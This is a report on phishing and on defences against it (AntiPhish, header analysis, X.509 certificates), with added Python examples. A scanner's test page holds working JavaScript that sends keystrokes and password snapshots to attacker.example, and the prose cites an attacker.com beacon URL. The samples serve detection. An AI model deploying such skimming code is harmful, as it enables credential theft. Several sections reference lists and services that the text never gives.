INTRODUCTION
Phishing is the practice in which criminals send unsolicited e-mails that
masquerade as coming from a legitimate authority, using logos and other
formatting copied from the company they are attempting to impersonate.
Once a user receives such a message, the phisher tries to lure them to a
web site that asks for personal information such as credit card numbers
and social security numbers, which is then used to take over the user's
accounts. The so-called "phishers" aim to steal usernames and passwords
for identity theft and bank fraud.
LITERATURE REVIEW
Comparison to Spam
The purpose of a phishing message is to acquire sensitive
information about a user. In order to do so, the message needs to
deceive the intended recipient into believing it is from a
legitimate organization. As a form of deception, a phishing
message contains no useful information for the intended recipient
and thus falls under the category of spam. Although phishing is
categorized as spam, it also differs from spam. Amongst other
things, spam tries to sell a product or service, while a phishing
message needs to look like it is from a legitimate organization.
Because phishing messages so closely resemble legitimate ones,
techniques that work on spam cannot be applied naively to phishing.
For example, text-based classification performs reasonably well at
identifying spam, but since a phishing message is forged to look like a
message from a legitimate organization, a text classifier applied
naively to phishing messages will have a high miss rate.
Anatomy of a phishing message
Content
The content is the part of the message that the user sees, and it is
what phishing message producers craft to deceive users. It can be
subdivided into two parts.
Headers
The headers are the part of the message which is primarily used
by the mail servers and the mail client to determine where the
message is going and how to unpack the message. Most users do
not see these headers, but in terms of determining if a message is
phishing or not, this part of the message can be quite useful.
Headers can be subdivided into three parts based on the entities
which add them to the message:
• Mail relays will add headers along the path of the message.
These are usually “Received” headers, which can be used to
determine the originating IP of the message and the path
taken by the message.
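To make the Received-header point concrete, here is an added example (not code from the page) that reconstructs the relay path from a message with the Python standard library. The message, its host names and IP addresses, and the spoofed From: line are all constructed for the example. The caveat it encodes is the one a practitioner needs: only the Received lines written by relays you control (here the assumed mx.recipient.example) can be trusted, because a phisher can prepend fake Received lines underneath them before the message ever reaches you.

```python
import email
import re
from email import policy

# Constructed sample message (not from the page). Relays PREPEND Received headers,
# so the top line was written by the last hop (our own MX, mx.recipient.example)
# and the bottom line by the first hop. The From: line is spoofed to look like a bank.
RAW_MESSAGE = """\
Received: from mail.relay-b.example (mail.relay-b.example [198.51.100.25])
\tby mx.recipient.example with ESMTP id 8d2a;
\tMon, 6 Mar 2006 09:15:02 +0000
Received: from outbound.relay-a.example (outbound.relay-a.example [192.0.2.44])
\tby mail.relay-b.example with SMTP;
\tMon, 6 Mar 2006 09:14:58 +0000
Received: from CUSTOMER-PC (unknown [203.0.113.7])
\tby outbound.relay-a.example with SMTP;
\tMon, 6 Mar 2006 09:14:31 +0000
From: "Account Services" <service@bank.example>
To: victim@recipient.example
Subject: Please verify your account

Click here to confirm your details.
"""

# "from <helo-name> (<reverse-dns> [<ip>]) by <relay>": the HELO name is whatever the
# sender announced; the bracketed IP is what the receiving relay actually saw.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)(?:\s+\((?P<paren>[^)]*)\))?\s+by\s+(?P<by>\S+)", re.I)
IP_RE = re.compile(r"\[([0-9a-fA-F.:]+)\]")


def parse_received(value):
    """Turn one Received header into {helo, ip, by}; None if it does not fit the pattern."""
    flat = re.sub(r"\s+", " ", value).strip()          # unfold continuation lines
    m = RECEIVED_RE.search(flat)
    if not m:
        return None
    ip = IP_RE.search(m.group("paren") or "")
    return {"helo": m.group("helo"), "ip": ip.group(1) if ip else None, "by": m.group("by")}


def relay_path(raw_message):
    """Received headers in chronological order (first relay first)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    hops.reverse()
    return hops


def originating_ip(raw_message, trusted_relays):
    """Separate the origin the headers CLAIM from the origin we can actually VOUCH for.

    Walking down from our own MX, a Received line is only reliable if the relay that
    wrote it ("by") is one we control; everything below the first foreign relay could
    have been forged by the phisher before the message reached us.
    """
    hops = relay_path(raw_message)
    verifiable = None
    for hop in reversed(hops):                           # newest (our MX) first
        if hop["by"] not in trusted_relays:
            break
        verifiable = hop["ip"]
    return {"claimed_origin": hops[0]["ip"] if hops else None,
            "verifiable_origin": verifiable}


if __name__ == "__main__":
    for hop in relay_path(RAW_MESSAGE):
        print(f'{hop["helo"]:<28} [{hop["ip"]}] -> {hop["by"]}')
    print(originating_ip(RAW_MESSAGE, trusted_relays={"mx.recipient.example"}))
```

For the constructed message the claimed origin is 203.0.113.7 but the only IP we can vouch for is 198.51.100.25, the host that connected to our own MX; the two lower Received lines are whatever that host chose to write.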
ANTI-PHISHING
JavaScript
AntiPhish is a browser extension that keeps track of the sensitive
information (such as passwords) a user has entered into trusted sites
and raises an alarm when the same information is typed into a form on
an untrusted site.

As long as the web page the user is viewing is pure HTML, AntiPhish can
easily mitigate phishing attacks, because the attacker can only obtain
the sensitive information after the user submits the form. Before that
happens, AntiPhish detects that sensitive information has been typed
into a form and cancels the operation.

Stopping a phishing attack on an HTML page that contains JavaScript is
not that easy, and special care has to be taken. JavaScript is a
powerful language that is widely used in web pages to provide
functionality such as submitting forms, opening windows, intercepting
events and performing input validity checks. At the same time, it gives
the attacker a wide range of possibilities for bypassing a monitoring
application such as AntiPhish. Just as AntiPhish creates hooks to
intercept user-generated events such as key strokes, the attacker can
create such hooks with JavaScript embedded in the HTML page. Instead of
waiting for the user to press a submit button, the attacker can
intercept the keys as they are pressed and send the information
character by character to a server of her choice. Typically this is
done by modifying the URL of an existing or hidden image to point at a
site the attacker controls (e.g., if "a" has been pressed, an image URL
may be set to http://attacker.com/key?a); the browser then fetches that
URL, delivering the keystroke without any form submission. Another
possibility is to set a simple timer and capture "snapshots" of the
information in the form fields. Either way, an important part of the
information can be captured without the user ever hitting a submit
button.

The easiest solution to the JavaScript problem would be to deactivate
JavaScript on any page that contains forms. Unfortunately, this is not
feasible because, as mentioned before, a large number of web sites use
JavaScript for validation and submission. The solution used in
AntiPhish is to deactivate JavaScript every time the focus is on an
HTML text element and to reactivate it whenever the focus is lost. With
this technique, the attacker is not able to create hooks or timers, or
to intercept browser events such as key presses, while the user is
typing into a text field, and the legitimate JavaScript functionality
on the page (such as input validation routines) is preserved. By the
time the text element loses focus and JavaScript is reactivated,
AntiPhish has already determined whether the information typed into the
element is sensitive, and if the web site is untrusted the operation
can be cancelled.

One side effect of this approach is that legitimate event-based
JavaScript functionality, such as input validation on key presses, will
not function. The use of key press events for input validation is,
however, uncommon; most web sites perform client-side validation once,
before a form is submitted.
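The patterns described above (a hook on key events, an image URL rewritten with each keystroke, a timer that snapshots form fields) can also be triaged statically once a suspect page is in hand. The following is an added example, not part of AntiPhish or of the page: it uses the Python standard library to pull inline scripts and on* handler attributes out of two constructed pages, a benign login form and a phishing clone that beacons to the assumed domain attacker.example, and flags the three patterns. It is a heuristic: external scripts are listed for the analyst to fetch rather than scanned, and a benign page that builds an image URL at run time will also trigger the beacon indicator.

```python
import re
from html.parser import HTMLParser

# Two constructed pages (not from the page or from AntiPhish). Both carry the same
# login form; the second adds the three exfiltration patterns, beaconing to the
# assumed attacker domain attacker.example through a 1x1 image.
BENIGN_PAGE = """<html><body>
<form id="login" onsubmit="return validate(this)">
  <input name="user"><input name="password" type="password"><input type="submit">
</form>
<script>
function validate(f) {
  if (f.user.value === "" || f.password.value.length < 8) { alert("check your input"); return false; }
  return true;
}
</script></body></html>"""

PHISHING_PAGE = """<html><body>
<img src="/logo.png"><img id="b" src="/blank.gif" width="1" height="1">
<form action="/login"><input name="user">
  <input name="password" type="password" onkeydown="leak(event)"></form>
<script src="/jquery.js"></script>
<script>
var b = document.getElementById("b");
function leak(e) { b.src = "http://attacker.example/key?" + encodeURIComponent(e.key); }
setInterval(function () {
  b.src = "http://attacker.example/snap?" + encodeURIComponent(document.forms[0].password.value);
}, 2000);
</script></body></html>"""


class ScriptCollector(HTMLParser):
    """Gathers inline <script> bodies, on* handler attributes and external script URLs."""

    def __init__(self):
        super().__init__()
        self.scripts, self.handlers, self.externals = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if tag == "script" and name == "src" and value:
                self.externals.append(value)
            elif name.startswith("on") and value:
                self.handlers.append(f"{name}={value}")   # keep the event name for matching

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


# Heuristics for the three patterns: a hook on key/input events, a .src assembled at
# run time (the image-URL beacon), and a timer whose callback reads form field values.
INDICATORS = {
    "key-event hook": re.compile(
        r"\bon(?:key(?:down|press|up)|input)\b\s*=|"
        r"addEventListener\(\s*['\"](?:key(?:down|press|up)|input)['\"]", re.I),
    "runtime-built image URL (beacon)": re.compile(r"\.src\s*=\s*[^;\n]*\+", re.I),
    "timer reads form values": re.compile(r"set(?:Interval|Timeout)\s*\(.*?\.value\b", re.S),
}


def scan_page(html):
    """Return the indicators found in a page's inline script, plus external scripts to fetch."""
    collector = ScriptCollector()
    collector.feed(html)
    code = "\n".join(collector.scripts + collector.handlers)
    found = [label for label, pattern in INDICATORS.items() if pattern.search(code)]
    return {"indicators": found, "external_scripts": collector.externals}


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("phishing", PHISHING_PAGE)):
        print(label, scan_page(page))
```

The benign page's validate() reads field values too, but only from the submit handler, which is exactly the distinction the passage draws: validation once at submit time is normal, a timer or key hook that reads fields while the user is still typing is not.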
Implementation details
The AntiPhish prototype was implemented as a Mozilla browser extension
(i.e., a plug-in). Mozilla browser extensions are written in the Mozilla
XML User-Interface Language (XUL) and JavaScript. The Mozilla
implementation of AntiPhish has a small footprint and consists of about
900 lines of JavaScript code and 200 lines of XUL user interface code.
Paul Tero's JavaScript DES implementation was used to encrypt the
stored sensitive information. (DES is a 56-bit legacy cipher; an
implementation written today would use AES.)
Digital Certificates
Digital certificates are part of a technology called Public Key
Infrastructure, or PKI. Digital certificates have been described as
virtual ID cards, and this is a useful analogy. There are many ways in
which digital certificates and ID cards really are the same: both ID
cards and client digital certificates contain information about the
user, such as the user's name, and information about the organization
that issued the certificate or card.
To create a digital certificate, a unique cryptographic key pair is
generated. One of these keys is referred to as the public key and the
other as the private key; the private key never leaves the user's
control. The certification authority (generally on your campus) creates
the digital certificate by combining information about the user and the
issuing organization with the public key and digitally signing the
whole thing. This is very much like an organization's ID office filling
out an ID card for the user and then signing it to make it official.
The certification process defines how a certificate authority
establishes that a person or institution is who they say they are.
Certification may require recipients to appear in person and to present
photographs, birth certificates, or social security numbers.
Certificates issued after rigorous authentication are more trustworthy
than certificates that required little or no authentication.
The contents of a digital certificate are prescribed by the X.509
standard, developed jointly by the ITU-T and ISO/IEC and profiled for
Internet use by the Internet Engineering Task Force (IETF) in RFC 5280.
The current version of the certificate format is X.509 v3. The
principal elements of a digital certificate are as follows:
• Version number of the certificate format
• Serial number of the certificate (unique per issuer)
• Signature algorithm identifier
• Issuer of the digital certificate: the distinguished name of the
certificate authority
• Validity period (not-before and not-after dates)
• Unique identification of the certificate holder (the subject's
distinguished name)
• Public key information (the key algorithm and the subject's public key)
• Extensions (v3 only), such as key usage and alternative names
• The issuer's digital signature over all of the above
The Parties to a Digital Certificate
In principle there are three different interests associated with a digital certificate:
The Requesting Party
The party who needs the certificate and will offer it for use by others;
they will generally provide some or all of the information it contains.
The Issuing Party
The party that digitally signs the certificate after creating the information in the
certificate or checking its correctness.
The Verifying Party (or Parties)
Parties that validate the signature on the certificate and then rely on its contents for
some purpose.
Type of Certificate | Requesting Party | Issuing Party | Verifying Party
Identity | The person concerned | The appropriate government agency | Anyone undertaking an identity check
Accreditation | A qualified member of a profession | The professional body | A user of the services offered by the member
Authorization | A customer wishing to access a resource | The resource owner | The resource owner
Types of Certificates
There are different types of certificates, each with different functions and this can
be confusing. It helps to differentiate between at least four types of certificates.
You can see samples of some of these different types of certificates in your
browser.
• Root or authority certificates
These are certificates that form the base (or root) of a certification
authority hierarchy, such as Thawte or CREN. These certificates are not
signed by another CA; they are self-signed by the CA that created them.
When a certificate is self-signed, the name in the Issuer field is the
same as the name in the Subject field, and its signature verifies with
the certificate's own public key. Because nobody else vouches for a
root, it has to be trusted explicitly (for example, by being shipped in
the browser's trust store).
• Institutional authority certificates
These certificates are also called campus certificates. These certificates are signed
by a third party verifying the authenticity of a campus certification authority.
Campuses then use their “authority” to issue client certificates for faculty, staff,
and students.
• Client certificates
These are also known as end-entity certificates, identity certificates, or personal
certificates. The Issuer is typically the campus CA.
• Web server certificates
These certificates are used to secure communications to and from Web
servers, for example when you buy something on the Web. They are called
server-side certificates. The Subject name in a server certificate is
the DNS name of the server (today the DNS names are also carried in the
Subject Alternative Name extension, which is what browsers check).
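As an added example for the list of principal elements above and for the self-signed definition in the root-certificate bullet (this is not code from the page or from CREN), the following Python builds the DER skeleton of an X.509 v3 certificate for a constructed campus CA and for a client certificate that CA issued, decodes the fields back out, and applies the self-signed test. The names, serial numbers and dates are assumed, and the public keys and signatures are placeholder bytes: the real signing step with the CA's private key is out of scope here, which is why the self-signed check compares Issuer and Subject only and notes that a real verifier must also check the signature with the certificate's own key.

```python
import datetime

# --- minimal DER encoder (only the ASN.1 types a certificate skeleton needs) ---
def _length(n):                              # short form below 128, else 0x80|len then the length bytes
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body
def tlv(tag, content):                       # tag-length-value, single-byte tags only
    return bytes([tag]) + _length(len(content)) + content
def der_int(v):                              # INTEGER with a minimal two's-complement body
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))
def der_oid(dotted):                         # OBJECT IDENTIFIER: first two arcs merged, rest base-128
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        while a := a >> 7:
            chunk.insert(0, 0x80 | (a & 0x7F))
        out += chunk
    return tlv(0x06, bytes(out))
def der_seq(*items): return tlv(0x30, b"".join(items))
def der_set(*items): return tlv(0x31, b"".join(items))
def der_utf8(s):     return tlv(0x0C, s.encode())
def der_utctime(dt): return tlv(0x17, dt.strftime("%y%m%d%H%M%SZ").encode())
def der_bits(b):     return tlv(0x03, b"\x00" + b)     # BIT STRING, zero unused bits
NULL, SHA256_RSA, RSA_KEY = b"\x05\x00", "1.2.840.113549.1.1.11", "1.2.840.113549.1.1.1"

def dn(org, cn):     # Name ::= SEQUENCE OF RelativeDistinguishedName; each RDN is a SET of type/value
    return der_seq(der_set(der_seq(der_oid("2.5.4.10"), der_utf8(org))),
                   der_set(der_seq(der_oid("2.5.4.3"), der_utf8(cn))))

def build_certificate(subject, issuer, serial, not_before, not_after, pubkey, signature):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }."""
    alg = der_seq(der_oid(SHA256_RSA), NULL)
    tbs = der_seq(tlv(0xA0, der_int(2)),     # [0] EXPLICIT version: v3 is carried as the integer 2
                  der_int(serial), alg, issuer,
                  der_seq(der_utctime(not_before), der_utctime(not_after)), subject,
                  der_seq(der_seq(der_oid(RSA_KEY), NULL), der_bits(pubkey)))
    return der_seq(tbs, alg, der_bits(signature))   # signature is a placeholder: no CA private key here

# --- decoder: walk the TLVs back out and name the principal elements ---
def parse_tlv(buf, pos=0):
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        return tag, buf[pos + 2:pos + 2 + first], pos + 2 + first
    n = first & 0x7F
    length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
    return tag, buf[pos + 2 + n:pos + 2 + n + length], pos + 2 + n + length
def children(content):
    out, pos = [], 0
    while pos < len(content):
        tag, body, pos = parse_tlv(content, pos)
        out.append((tag, body))
    return out
def decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, acc = arcs + [acc], 0
    return ".".join(map(str, arcs))
ATTR = {"2.5.4.3": "CN", "2.5.4.10": "O"}
def decode_name(body):
    pairs = [children(atv) for _, rdn in children(body) for _, atv in children(rdn)]
    return ",".join(f"{ATTR.get(decode_oid(o), decode_oid(o))}={v.decode()}" for (_, o), (_, v) in pairs)

def certificate_fields(cert):
    (_, tbs), _, (_, sig) = children(parse_tlv(cert)[1])
    (_, ver), (_, serial), (_, alg), (_, issuer), (_, validity), (_, subject), (_, spki) = children(tbs)
    (_, nb), (_, na) = children(validity)
    when = lambda t: datetime.datetime.strptime(t.decode(), "%y%m%d%H%M%SZ")
    return {"version": int.from_bytes(children(ver)[0][1], "big") + 1,
            "serial": int.from_bytes(serial, "big", signed=True),
            "signature_algorithm": decode_oid(children(alg)[0][1]),
            "issuer": decode_name(issuer), "subject": decode_name(subject),
            "not_before": when(nb), "not_after": when(na),
            "public_key": children(spki)[1][1][1:],      # strip the unused-bits byte
            "signature": sig[1:], "issuer_der": issuer, "subject_der": subject}

def is_self_signed(fields):
    # The page's definition: Issuer == Subject. Compare the DER bytes, not the printed strings.
    # A real verifier must also check the signature with the certificate's own public key.
    return fields["issuer_der"] == fields["subject_der"]
def is_within_validity(fields, when):
    return fields["not_before"] <= when <= fields["not_after"]

# Constructed data: assumed names, serials and dates; keys and signatures are placeholder bytes.
ROOT_NAME = dn("Example University", "Example University Campus CA")
USER_NAME = dn("Example University", "Alice Student")
NOT_BEFORE, NOT_AFTER = datetime.datetime(2006, 1, 1), datetime.datetime(2007, 1, 1)
MID_TERM, AFTER_EXPIRY = datetime.datetime(2006, 6, 1), datetime.datetime(2007, 6, 1)
ROOT_CERT = build_certificate(ROOT_NAME, ROOT_NAME, 1, NOT_BEFORE, NOT_AFTER, b"root-public-key", b"sig")
USER_CERT = build_certificate(USER_NAME, ROOT_NAME, 4711, NOT_BEFORE, NOT_AFTER, b"alice-public-key", b"sig")

if __name__ == "__main__":
    for f in map(certificate_fields, (ROOT_CERT, USER_CERT)):
        print(f'{f["subject"]!r} issued by {f["issuer"]!r}; self-signed: {is_self_signed(f)}')
```

The TBSCertificate here is a few hundred bytes, so the encoder's long-form length path is exercised as it would be for a real certificate. The campus CA's certificate comes back with Issuer equal to Subject; Alice's comes back with the campus CA as Issuer, which is the "client certificate" case described above.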
With these three levels of service — including the free test certificates — CREN
can help campuses get started using digital certificates at a level matching their
particular campus needs.
RECOMMENDATION
Reducing the risk of phishing is very important for today's businesses,
because attackers must be kept out of companies' databases and
customers' accounts. Education alone is not enough, since phishers are
getting better every day and keep coming up with new tricks to catch
unwary customers.
A root cause of the phishing problem is that login systems are weak: a
username and a password are all an attacker needs, so user
authentication has to be tightened. Companies could strengthen their
cryptographic protection by using IPSec VPNs and digital certificates;
with IPSec VPNs, both the customer and the merchant would need to
obtain digital certificates from a certificate authority. While doing
this research we came across an article from PayPal in which the
company is persuading e-mail providers to block messages that claim to
come from PayPal but lack digital signatures. The reason is that PayPal
is one of the most heavily spoofed brands that fraudsters use today.
This is a good idea and an effective way to keep forged PayPal messages
out of customers' inboxes. Every company that conducts business online,
not only PayPal, should adopt a similar strategy; doing so helps
customers gain confidence in doing business and dealing with money
online. In addition, well-known companies should increase user
awareness through education and training, and work with the FBI to
track down phishers.
CONCLUSION
In short, the impact of phishing attacks is increasing dramatically
every day; attacks on financial services companies have been doubling
year over year. It is of crucial importance for companies to come up
with new ways to address phishing, because it can become a major loss
for well-known companies. It can also cause consumers to lose
confidence in doing business online, which affects every company with
an online presence. No single technology can stop phishing attacks,
but there are many ways to prevent phishers from accomplishing their
goals. Consumer education can increase awareness of the phishing threat
and other online risks. Lastly, biometrics should become one of the
major tools in the fight against phishing, because it adds a further
step to user authentication.